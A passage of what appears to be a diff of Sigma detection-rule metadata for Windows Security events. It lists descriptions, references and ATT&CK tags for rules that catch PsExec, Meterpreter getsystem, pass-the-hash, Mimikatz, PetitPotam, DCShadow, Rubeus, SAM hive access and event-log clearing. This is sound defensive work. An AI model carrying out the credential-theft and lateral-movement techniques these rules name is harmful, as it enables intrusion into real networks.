- "value": "Metasploit Or Impacket Service Installation Via SMB PsExec", - "meta": { - "refs": [ - "https://bczyz1.github.io/2021/01/30/psexec.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_metasploit_or_impacket_smb_psexec_service_install.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002", - "attack.t1570", - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2021/01/21", - "filename": "win_security_metasploit_or_impacket_smb_psexec_service_install.yml", - "author": "Bartlomiej Czyz, Relativity", - "level": "high", - "falsepositive": [ - "Possible, different agents with a 8 character binary and a 4, 8 or 16 character service name" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", - "uuid": "ecbc5e16-58e0-4521-9c60-eb9a7ea4ad34", - "value": "Meterpreter or Cobalt Strike Getsystem Service Installation - Security", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", - "https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1134.001", - "attack.t1134.002" - ], - "creation_date": "2019/10/26", - "filename": "win_security_meterpreter_or_cobaltstrike_getsystem_service_install.yml", - "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", - "level": "critical", - "falsepositive": [ - "Highly unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects NetNTLM downgrade attack", - "uuid": "d3abac66-f11c-4ed0-8acb-50cc29c97eed", - "value": "NetNTLM Downgrade Attack", - "meta": { - "refs": [ - "https://www.optiv.com/blog/post-exploitation-using-netntlm-downgrade-attacks", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_ntlm_downgrade.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" - ], - "creation_date": "2018/03/20", - "filename": "win_security_net_ntlm_downgrade.yml", - "author": "Florian Roth, wagga", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects unusual processes accessing desktop.ini remotely over network share, which can be leveraged to alter how Explorer displays a folder's content (i.e. renaming files) without changing them on disk.", - "uuid": "35bc7e28-ee6b-492f-ab04-da58fcf6402e", - "value": "Windows Network Access Suspicious desktop.ini Action", - "meta": { - "refs": [ - "https://isc.sans.edu/forums/diary/Desktopini+as+a+postexploitation+tool/25912/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_net_share_obj_susp_desktop_ini.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.009" - ], - "creation_date": "2021/12/06", - "filename": "win_security_net_share_obj_susp_desktop_ini.yml", - "author": "Tim Shelton (HAWK.IO)", - "level": "medium", - "falsepositive": [ - "Read only access list authority" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects possible bypass EDR and SIEM via abnormal user account name.", - "uuid": "cfeed607-6aa4-4bbd-9627-b637deb723c8", - "value": "New or Renamed User Account with '$' in Attribute 'SamAccountName'", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_new_or_renamed_user_account_with_dollar_sign.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1036" - ], - "creation_date": "2019/10/25", - "filename": "win_security_new_or_renamed_user_account_with_dollar_sign.yml", - "author": "Ilyas Ochkov, oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "This event is generated when an authenticated user who is not allowed to log on remotely attempts to connect to this computer through Remote Desktop.\nOften, this event can be generated by attackers when searching for available windows servers in the network.\n", - "uuid": "8e5c03fa-b7f0-11ea-b242-07e0576828d9", - "value": "Denied Access To Remote Desktop", - "meta": { - "refs": [ - "https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventid=4825", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_not_allowed_rdp_access.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.001" - ], - "creation_date": "2020/06/27", - "filename": "win_security_not_allowed_rdp_access.yml", - "author": "Pushkarev Dmitry", - "level": "medium", - "falsepositive": [ - "Valid user was not added to RDP group" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects successful logon with logon type 9 (NewCredentials) which matches the Overpass the Hash behavior of e.g Mimikatz's sekurlsa::pth module.", - "uuid": "192a0330-c20b-4356-90b6-7b7049ae0b87", - "value": "Successful Overpass the Hash Attempt", - "meta": { - "refs": [ - "https://cyberwardog.blogspot.de/2017/04/chronicles-of-threat-hunter-hunting-for.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_overpass_the_hash.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.s0002", - "attack.t1550.002" - ], - "creation_date": "2018/02/12", - "filename": "win_security_overpass_the_hash.yml", - "author": "Roberto Rodriguez (source), Dominik Schaudel (rule)", - "level": "high", - "falsepositive": [ - "Runas command-line tool using /netonly parameter" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the attack technique pass the hash which is used to move laterally inside the network", - "uuid": "8eef149c-bd26-49f2-9e5a-9b00e3af499b", - "value": "Pass the Hash Activity 2", - "meta": { - "refs": [ - "https://github.com/iadgov/Event-Forwarding-Guidance/tree/master/Events", - "https://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis", - "https://blog.stealthbits.com/how-to-detect-pass-the-hash-attacks/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_pass_the_hash_2.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1550.002" - ], - "creation_date": "2019/06/14", - "filename": "win_security_pass_the_hash_2.yml", - "author": "Dave Kennedy, Jeff Warren (method) / David Vassallo (rule)", - "level": "medium", - "falsepositive": [ - "Administrator activity" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detect PetitPotam coerced authentication activity.", - "uuid": "1ce8c8a3-2723-48ed-8246-906ac91061a6", - "value": "Possible PetitPotam Coerce Authentication Attempt", - "meta": { - "refs": [ - "https://github.com/topotam/PetitPotam", - "https://github.com/splunk/security_content/blob/0dd6de32de2118b2818550df9e65255f4109a56d/detections/endpoint/petitpotam_network_share_access_request.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_network_share.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1187" - ], - "creation_date": "2021/09/02", - "filename": "win_security_petitpotam_network_share.yml", - "author": "Mauricio Velazco, Michael Haag", - "level": "high", - "falsepositive": [ - "Unknown. Feedback welcomed." - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detect suspicious Kerberos TGT requests.\nOnce an attacer obtains a computer certificate by abusing Active Directory Certificate Services in combination with PetitPotam, the next step would be to leverage the certificate for malicious purposes.\nOne way of doing this is to request a Kerberos Ticket Granting Ticket using a tool like Rubeus.\nThis request will generate a 4768 event with some unusual fields depending on the environment.\nThis analytic will require tuning, we recommend filtering Account_Name to the Domain Controller computer accounts.\n", - "uuid": "6a53d871-682d-40b6-83e0-b7c1a6c4e3a5", - "value": "PetitPotam Suspicious Kerberos TGT Request", - "meta": { - "refs": [ - "https://github.com/topotam/PetitPotam", - "https://isc.sans.edu/forums/diary/Active+Directory+Certificate+Services+ADCS+PKI+domain+admin+vulnerability/27668/", - "https://github.com/splunk/security_content/blob/develop/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_petitpotam_susp_tgt_request.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1187" - ], - "creation_date": "2021/09/02", - "filename": "win_security_petitpotam_susp_tgt_request.yml", - "author": "Mauricio Velazco, Michael Haag", - "level": "high", - "falsepositive": [ - "False positives are possible if the environment is using certificates for authentication. We recommend filtering Account_Name to the Domain Controller computer accounts." - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects DCShadow via create new SPN", - "uuid": "32e19d25-4aed-4860-a55a-be99cb0bf7ed", - "value": "Possible DC Shadow Attack", - "meta": { - "refs": [ - "https://github.com/Neo23x0/sigma/blob/ec5bb710499caae6667c7f7311ca9e92c03b9039/rules/windows/builtin/win_dcsync.yml", - "https://twitter.com/gentilkiwi/status/1003236624925413376", - "https://gist.github.com/gentilkiwi/dcc132457408cf11ad2061340dcb53c2", - "https://blog.alsid.eu/dcshadow-explained-4510f52fc19d", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_possible_dc_shadow.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1207" - ], - "creation_date": "2019/10/25", - "filename": "win_security_possible_dc_shadow.yml", - "author": "Ilyas Ochkov, oscd.community, Chakib Gzenayi (@Chak092), Hosni Mribah", - "level": "medium", - "falsepositive": [ - "Valid on domain controllers; exclude known DCs" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects powershell script installed as a Service", - "uuid": "2a926e6a-4b81-4011-8a96-e36cc8c04302", - "value": "PowerShell Scripts Installed as Services - Security", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_powershell_script_installed_as_service.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2020/10/06", - "filename": "win_security_powershell_script_installed_as_service.yml", - "author": "oscd.community, Natalia Shornikova", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects access to a protected_storage service over the network. Potential abuse of DPAPI to extract domain backup keys from Domain Controllers", - "uuid": "45545954-4016-43c6-855e-eae8f1c369dc", - "value": "Protected Storage Service Access", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/06_credential_access/WIN-190620024610.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_protected_storage_service_access.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2019/08/10", - "filename": "win_security_protected_storage_service_access.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code", - "uuid": "b0d77106-7bb0-41fe-bd94-d1752164d066", - "value": "Rare Schtasks Creations", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rare_schtasks_creations.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.persistence", - "car.2013-08-001", - "attack.t1053.005" - ], - "creation_date": "2017/03/23", - "filename": "win_security_rare_schtasks_creations.yml", - "author": "Florian Roth", - "level": "low", - "falsepositive": [ - "Software installation", - "Software updates" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the use of a scanner by zerosum0x0 that discovers targets vulnerable to CVE-2019-0708 RDP RCE aka BlueKeep", - "uuid": "8400629e-79a9-4737-b387-5db940ab2367", - "value": "Scanner PoC for CVE-2019-0708 RDP RCE Vuln", - "meta": { - "refs": [ - "https://twitter.com/AdamTheAnalyst/status/1134394070045003776", - "https://github.com/zerosum0x0/CVE-2019-0708", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_bluekeep_poc_scanner.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1210", - "car.2013-07-002" - ], - "creation_date": "2019/06/02", - "filename": "win_security_rdp_bluekeep_poc_scanner.yml", - "author": "Florian Roth (rule), Adam Bradbury (idea)", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "RDP login with localhost source address may be a tunnelled login", - "uuid": "51e33403-2a37-4d66-a574-1fda1782cc31", - "value": "RDP Login from Localhost", - "meta": { - "refs": [ - "https://www.fireeye.com/blog/threat-research/2019/01/bypassing-network-restrictions-through-rdp-tunneling.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_localhost_login.yml" - ], - "tags": [ - "attack.lateral_movement", - "car.2013-07-002", - "attack.t1021.001" - ], - "creation_date": "2019/01/28", - "filename": "win_security_rdp_localhost_login.yml", - "author": "Thomas Patzke", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address", - "uuid": "5bed80b6-b3e8-428e-a3ae-d3c757589e41", - "value": "RDP over Reverse SSH Tunnel WFP", - "meta": { - "refs": [ - "https://twitter.com/SBousseaden/status/1096148422984384514", - "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/44fbe85f72ee91582876b49678f9a26292a155fb/Command%20and%20Control/DE_RDP_Tunnel_5156.evtx", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_rdp_reverse_tunnel.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.command_and_control", - "attack.lateral_movement", - "attack.t1090.001", - "attack.t1090.002", - "attack.t1021.001", - "car.2013-07-002" - ], - "creation_date": "2019/02/16", - "filename": "win_security_rdp_reverse_tunnel.yml", - "author": "Samir Bousseaden", - "level": "high", - "falsepositive": [ - "Programs that connect locally to the RDP port" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential use of Rubeus via registered new trusted logon process", - "uuid": "12e6d621-194f-4f59-90cc-1959e21e69f7", - "value": "Register new Logon Process by Rubeus", - "meta": { - "refs": [ - "https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_register_new_logon_process_by_rubeus.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.t1558.003" - ], - "creation_date": "2019/10/24", - "filename": "win_security_register_new_logon_process_by_rubeus.yml", - "author": "Roberto Rodriguez (source), Ilyas Ochkov (rule), oscd.community", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects basic PowerShell Remoting (WinRM) by monitoring for network inbound connections to ports 5985 OR 5986", - "uuid": "13acf386-b8c6-4fe0-9a6e-c4756b974698", - "value": "Remote PowerShell Sessions Network Connections (WinRM)", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190511223310.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_remote_powershell_session.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001" - ], - "creation_date": "2019/09/12", - "filename": "win_security_remote_powershell_session.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "high", - "falsepositive": [ - "Legitimate use of remote PowerShell execution" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects possible Kerberos Replay Attack on the domain controllers when \"KRB_AP_ERR_REPEAT\" Kerberos response is sent to the client", - "uuid": "5a44727c-3b85-4713-8c44-4401d5499629", - "value": "Replay Attack Detected", - "meta": { - "refs": [ - "https://github.com/Yamato-Security/EnableWindowsLogSettings/blob/7f6d755d45ac7cc9fc35b0cbf498e6aa4ef19def/ConfiguringSecurityLogAuditPolicies.md", - "https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4649", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_replay_attack_detected.yml" - ], - "tags": "No established tags", - "creation_date": "2022/10/14", - "filename": "win_security_replay_attack_detected.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects the renaming of an existing computer account to a account name that doesn't contain a $ symbol as seen in attacks against CVE-2021-42287", - "uuid": "45eb2ae2-9aa2-4c3a-99a5-6e5077655466", - "value": "Suspicious Computer Account Name Change CVE-2021-42287", - "meta": { - "refs": [ - "https://medium.com/@mvelazco/hunting-for-samaccountname-spoofing-cve-2021-42287-and-domain-controller-impersonation-f704513c8a45", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_samaccountname_spoofing_cve_2021_42287.yml" - ], - "tags": "No established tags", - "creation_date": "2021/12/22", - "filename": "win_security_samaccountname_spoofing_cve_2021_42287.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects handles requested to SAM registry hive", - "uuid": "f8748f2c-89dc-4d95-afb0-5a2dfdbad332", - "value": "SAM Registry Hive Handle Request", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190725024610.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_sam_registry_hive_handle_request.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1012", - "attack.credential_access", - "attack.t1552.002" - ], - "creation_date": "2019/08/12", - "filename": "win_security_sam_registry_hive_handle_request.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects scheduled task deletion events. Scheduled tasks are likely to be deleted if not used for persistence. Malicious Software often creates tasks directly under the root node e.g. \\TASKNAME", - "uuid": "4f86b304-3e02-40e3-aa5d-e88a167c9617", - "value": "Scheduled Task Deletion", - "meta": { - "refs": [ - "https://twitter.com/matthewdunwoody/status/1352356685982146562", - "https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4699", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scheduled_task_deletion.yml" - ], - "tags": [ - "attack.execution", - "attack.privilege_escalation", - "car.2013-08-001", - "attack.t1053.005" - ], - "creation_date": "2021/01/22", - "filename": "win_security_scheduled_task_deletion.yml", - "author": "David Strassegger, Tim Shelton", - "level": "low", - "falsepositive": [ - "Software installation" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects non-system users failing to get a handle of the SCM database.", - "uuid": "13addce7-47b2-4ca0-a98f-1de964d1d669", - "value": "SCM Database Handle Failure", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_handle_failure.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1010" - ], - "creation_date": "2019/08/12", - "filename": "win_security_scm_database_handle_failure.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects non-system users performing privileged operation os the SCM database", - "uuid": "dae8171c-5ec6-4396-b210-8466585b53e9", - "value": "SCM Database Privileged Operation", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/07_discovery/WIN-190826010110.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scm_database_privileged_operation.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1548" - ], - "creation_date": "2019/08/15", - "filename": "win_security_scm_database_privileged_operation.yml", - "author": "Roberto Rodriguez @Cyb3rWard0g, Tim Shelton", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detect potential adversaries leveraging WMI ActiveScriptEventConsumers remotely to move laterally in a network", - "uuid": "9599c180-e3a8-4743-8f92-7fb96d3be648", - "value": "Remote WMI ActiveScriptEventConsumers", - "meta": { - "refs": [ - "https://threathunterplaybook.com/notebooks/windows/08_lateral_movement/WIN-200902020333.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_scrcons_remote_wmi_scripteventconsumer.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.003" - ], - "creation_date": "2020/09/02", - "filename": "win_security_scrcons_remote_wmi_scripteventconsumer.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "SCCM" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", - "uuid": "c4e92a97-a9ff-4392-9d2d-7a4c642768ca", - "value": "Service Installed By Unusual Client - Security", - "meta": { - "refs": [ - "https://www.elastic.co/guide/en/security/current/windows-service-installed-via-an-unusual-client.html", - "https://twitter.com/SBousseaden/status/1490608838701166596", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_service_installation_by_unusal_client.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1543" - ], - "creation_date": "2022/09/15", - "filename": "win_security_service_installation_by_unusal_client.yml", - "author": "Tim Rauch", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "security", - "logsource.product": "windows" - } - }, - { - "description": "Look for non-system accounts SMB accessing a file with write (0x2) access mask via administrative share (i.e C$).", - "uuid": "b210394c-ba12-4f89-9117-44a2464b9511", - "value": "SMB Create Remote File Admin Share", - "meta": { - "refs": [ - "https://github.com/OTRF/ThreatHunter-Playbook/blob/f7a58156dbfc9b019f17f638b8c62d22e557d350/playbooks/WIN-201012004336.yaml", - "https://securitydatasets.com/notebooks/small/windows/08_lateral_movement/SDWIN-200806015757.html?highlight=create%20file", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_smb_file_creation_admin_shares.yml" - ], - "tags": [ - "attack.lateral_movement", - "attack.t1021.002" - ], - "creation_date": "2020/08/06", - "filename": "win_security_smb_file_creation_admin_shares.yml", - "author": "Jose Rodriguez (@Cyb3rPandaH), OTR (Open Threat Research)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Addition of domains is seldom and should be verified for legitimacy.", - "uuid": "0255a820-e564-4e40-af2b-6ac61160335c", - "value": "Addition of Domain Trusts", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_domain_trust.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2019/12/03", - "filename": "win_security_susp_add_domain_trust.yml", - "author": "Thomas Patzke", - "level": "medium", - "falsepositive": [ - "Legitimate extension of domain structure" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "An attacker can use the SID history attribute to gain additional privileges.", - "uuid": "2632954e-db1c-49cb-9936-67d1ef1d17d2", - "value": "Addition of SID History to Active Directory Object", - "meta": { - "refs": [ - "https://adsecurity.org/?p=1772", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_add_sid_history.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1134.005" - ], - "creation_date": "2017/02/19", - "filename": "win_security_susp_add_sid_history.yml", - "author": "Thomas Patzke, @atc_project (improvements)", - "level": "medium", - "falsepositive": [ - "Migration of an account into a new domain" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Code integrity failures may indicate tampered executables.", - "uuid": "470ec5fa-7b4e-4071-b200-4c753100f49b", - "value": "Failed Code Integrity Checks", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_codeintegrity_check_failure.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027.001" - ], - "creation_date": "2019/12/03", - "filename": "win_security_susp_codeintegrity_check_failure.yml", - "author": "Thomas Patzke", - "level": "low", - "falsepositive": [ - "Disk device errors" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious computer name samtheadmin-{1..100}$ generated by hacktool", - "uuid": "39698b3f-da92-4bc6-bfb5-645a98386e45", - "value": "Win Susp Computer Name Containing Samtheadmin", - "meta": { - "refs": [ - "https://twitter.com/malmoeb/status/1511760068743766026", - "https://github.com/WazeHell/sam-theadmin/blob/main/sam_the_admin.py", - "https://github.com/helloexp/0day/blob/614227a7b9beb0e91e7e2c6a5e532e6f7a8e883c/00-CVE_EXP/CVE-2021-42287/sam-the-admin/sam_the_admin.py", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_computer_name.yml" - ], - "tags": [ - "cve.2021.42278", - "cve.2021.42287", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" - ], - "creation_date": "2022/09/09", - "filename": "win_security_susp_computer_name.yml", - "author": "elhoim", - "level": "critical", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "security", - "logsource.product": "windows" - } - }, - { - "description": "The Directory Service Restore Mode (DSRM) account is a local administrator account on Domain Controllers. Attackers may change the password to gain persistence.", - "uuid": "53ad8e36-f573-46bf-97e4-15ba5bf4bb51", - "value": "Password Change on Directory Service Restore Mode (DSRM) Account", - "meta": { - "refs": [ - "https://adsecurity.org/?p=1714", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_dsrm_password_change.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ], - "creation_date": "2017/02/19", - "filename": "win_security_susp_dsrm_password_change.yml", - "author": "Thomas Patzke", - "level": "high", - "falsepositive": [ - "Initial installation of a domain controller" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "uuid": "d99b79d2-0a6f-4f46-ad8b-260b6e17f982", - "value": "Security Eventlog Cleared", - "meta": { - "refs": [ - "https://twitter.com/deviouspolack/status/832535435960209408", - "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_eventlog_cleared.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" - ], - "creation_date": "2017/01/10", - "filename": "win_security_susp_eventlog_cleared.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects a source user failing to authenticate with multiple users using explicit credentials on a host.", - "uuid": "196a29c2-e378-48d8-ba07-8a9e61f7fab9", - "value": "Multiple Users Attempting To Authenticate Using Explicit Credentials", - "meta": { - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_explicit_credentials.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ], - "creation_date": "2021/06/01", - "filename": "win_security_susp_failed_logons_explicit_credentials.yml", - "author": "Mauricio Velazco", - "level": "medium", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects failed logins with multiple accounts from a single process on the system.", - "uuid": "fe563ab6-ded4-4916-b49f-a3a8445fe280", - "value": "Multiple Users Failing to Authenticate from Single Process", - "meta": { - "refs": [ - "https://docs.splunk.com/Documentation/ESSOC/3.22.0/stories/UseCase#Active_directory_password_spraying", - "https://www.trimarcsecurity.com/single-post/2018/05/06/trimarc-research-detecting-password-spraying-with-security-event-auditing", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_process.yml" - ], - "tags": [ - "attack.t1110.003", - "attack.initial_access", - "attack.privilege_escalation" - ], - "creation_date": "2021/06/01", - "filename": "win_security_susp_failed_logons_single_process.yml", - "author": "Mauricio Velazco", - "level": "medium", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious failed logins with different user accounts from a single source system", - "uuid": "e98374a6-e2d9-4076-9b5c-11bdb2569995", - "value": "Failed Logins with Different Accounts from Single Source System", - "meta": { - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/security/win_security_susp_failed_logons_single_source.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1078" - ], - "creation_date": "2017/01/10", - "filename": "win_security_susp_failed_logons_single_source.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Terminal servers", - "Jump servers", - "Other multiuser systems like Citrix server farms", - "Workstations with frequently changing users" - ], - "logsource.category": "No established category", - "logsource.product": "windows" - } - }, - { - "description": "Detects suspicious failed logins with different user accounts from a single source system", - "uuid": 